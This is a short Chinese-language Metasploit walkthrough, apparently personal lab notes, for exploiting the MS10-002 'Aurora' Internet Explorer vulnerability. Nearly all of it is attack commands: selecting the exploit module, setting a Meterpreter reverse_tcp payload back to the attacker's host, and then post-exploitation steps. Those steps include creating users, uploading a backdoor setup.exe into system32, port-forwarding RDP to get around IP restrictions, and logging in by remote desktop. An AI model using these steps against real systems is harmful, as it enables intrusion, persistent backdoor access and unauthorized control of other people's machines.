保证网络连通性,配置网络地址
第一次使用msfconsole,开启内建的数据库PostgreSQL和metasplote
开启PostgreSQL: service postgresql start
开启metasploit: service metasploit start
[email protected]:~# msfconsole
查找10-002漏洞模块 search 10-002
use exploit/windows/browser/ms10_002_aurora 进行漏洞攻击
set payload windows/meterpreter/reverse_tcp 定义攻击载荷
set lhost 192.168.48.123 定义本机地址
set URIPATH / 定义url的后缀(这里我只设置了一个/)
exploit 开发
在攻击主机打开目标网站http://192.168.48.123:8080/
sessions -i 1 打开连接会话
在这里可以对系统创建用户
rdesktop -u administrator -p 123 192.168.48.100:3389
1、session 查看已经成功获取的会话
可以使用session -i 连接到指定序号的meterpreter会话已继续利用
2、shell命令
3、getuid查看meterpreter注入到目标主机的进程所属用户
4、upload命令上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下
upload setup.exe C:\\windows\\system32\
5、portfwd 端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
例如:portfwd add -l 1122 -p 3389 -r 192.168.48.100
把目标主机192.168.48.100的3389端口转发到1122端口
这是只需要连接目标的1122端口就可以打开远程桌面了
rdesktop -u administrator -p 123456 192.168.48.100:1122
6、sysinfo查看目标主机系统信息
7、ps 查看目标主机上运行的进程信息,结合migrate使用